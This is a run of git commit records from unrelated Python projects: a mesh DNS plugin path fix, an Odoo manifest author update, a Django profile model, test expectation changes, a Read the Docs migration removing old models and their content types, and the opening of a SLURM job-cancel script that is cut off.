class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
<commit_before>import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
<commit_msg>Fix bad path for mesh-reverse.db<commit_after>import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
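The fix above only moves the output path, but the PTR generation it touches is easy to demonstrate with the standard library. A sketch using ipaddress (Python 3.5+), which yields the same in-addr.arpa name as IPy's reverseName() minus the trailing dot that IPy appends; the address and hostname are illustrative:
import ipaddress

ip = ipaddress.ip_address('10.0.0.1')
# Emits one zone-file line in the same tab-separated shape as the plugin.
print('%s.\t\tPTR\thost.example.org.' % ip.reverse_pointer)
# prints: 1.0.0.10.in-addr.arpa.  PTR  host.example.org.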
fb03522237afdd56059fb0146e1609b85606286f
|
l10n_ch_import_cresus/__openerp__.py
|
l10n_ch_import_cresus/__openerp__.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
Add Odoo Community Association (OCA) as author
|
Add Odoo Community Association (OCA) as author
|
Python
|
agpl-3.0
|
open-net-sarl/l10n-switzerland,BT-ojossen/l10n-switzerland,cgaspoz/l10n-switzerland,CompassionCH/l10n-switzerland,BT-fgarbely/l10n-switzerland,BT-csanchez/l10n-switzerland,cyp-opennet/ons_cyp_github,BT-fgarbely/l10n-switzerland,ndtran/l10n-switzerland,CompassionCH/l10n-switzerland,cyp-opennet/ons_cyp_github,open-net-sarl/l10n-switzerland,BT-aestebanez/l10n-switzerland,michl/l10n-switzerland,BT-ojossen/l10n-switzerland
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
Add Odoo Community Association (OCA) as author
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
<commit_before># -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
<commit_msg>Add Odoo Community Association (OCA) as author<commit_after>
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
Add Odoo Community Association (OCA) as author# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
<commit_before># -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
<commit_msg>Add Odoo Community Association (OCA) as author<commit_after># -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
53ff13fa0822dbabf554360bf000f8b3bfe41f40
|
imagersite/imager_profile/models.py
|
imagersite/imager_profile/models.py
|
from django.db import models
# Create your models here.
|
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
Set up basic imagerprofile and made first migration
|
Set up basic imagerprofile and made first migration
|
Python
|
mpl-2.0
|
WillWeatherford/django-imager,WillWeatherford/django-imager
|
from django.db import models
# Create your models here.
Set up basic imagerprofile and made first migration
|
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
<commit_before>from django.db import models
# Create your models here.
<commit_msg>Set up basic imagerprofile and made first migration<commit_after>
|
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
from django.db import models
# Create your models here.
Set up basic imagerprofile and made first migration
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
<commit_before>from django.db import models
# Create your models here.
<commit_msg>Set up basic imagerprofile and made first migration<commit_after>"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
48d0dc98fd859ea1d8cf25370fe0be9ac1350448
|
selftest/subdir/proc.py
|
selftest/subdir/proc.py
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
Mark broken pipe test with expected failure
|
Mark broken pipe test with expected failure
|
Python
|
bsd-2-clause
|
depp/idiotest,depp/idiotest
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
Mark broken pipe test with expected failure
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
<commit_before># Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
<commit_msg>Mark broken pipe test with expected failure<commit_after>
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
Mark broken pipe test with expected failure
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
<commit_before># Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
<commit_msg>Mark broken pipe test with expected failure<commit_after># Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
39708edfad5698b34771eba941ac822cbf84baa7
|
readthedocs/oauth/migrations/0004_drop_github_and_bitbucket_models.py
|
readthedocs/oauth/migrations/0004_drop_github_and_bitbucket_models.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
Drop content type in migration as well
|
Drop content type in migration as well
|
Python
|
mit
|
stevepiercy/readthedocs.org,techtonik/readthedocs.org,pombredanne/readthedocs.org,rtfd/readthedocs.org,stevepiercy/readthedocs.org,istresearch/readthedocs.org,techtonik/readthedocs.org,pombredanne/readthedocs.org,tddv/readthedocs.org,espdev/readthedocs.org,istresearch/readthedocs.org,rtfd/readthedocs.org,davidfischer/readthedocs.org,safwanrahman/readthedocs.org,davidfischer/readthedocs.org,davidfischer/readthedocs.org,davidfischer/readthedocs.org,espdev/readthedocs.org,stevepiercy/readthedocs.org,espdev/readthedocs.org,espdev/readthedocs.org,tddv/readthedocs.org,istresearch/readthedocs.org,safwanrahman/readthedocs.org,espdev/readthedocs.org,safwanrahman/readthedocs.org,safwanrahman/readthedocs.org,tddv/readthedocs.org,rtfd/readthedocs.org,istresearch/readthedocs.org,rtfd/readthedocs.org,stevepiercy/readthedocs.org,techtonik/readthedocs.org,pombredanne/readthedocs.org,techtonik/readthedocs.org
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
Drop content type in migration as well
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
<commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
<commit_msg>Drop content type in migration as well<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
Drop content type in migration as well
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
<commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
<commit_msg>Drop content type in migration as well<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
056b4ae938ab1aacf5e3f48a1e17919a79ff29b7
|
scripts/sbatch_cancel.py
|
scripts/sbatch_cancel.py
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
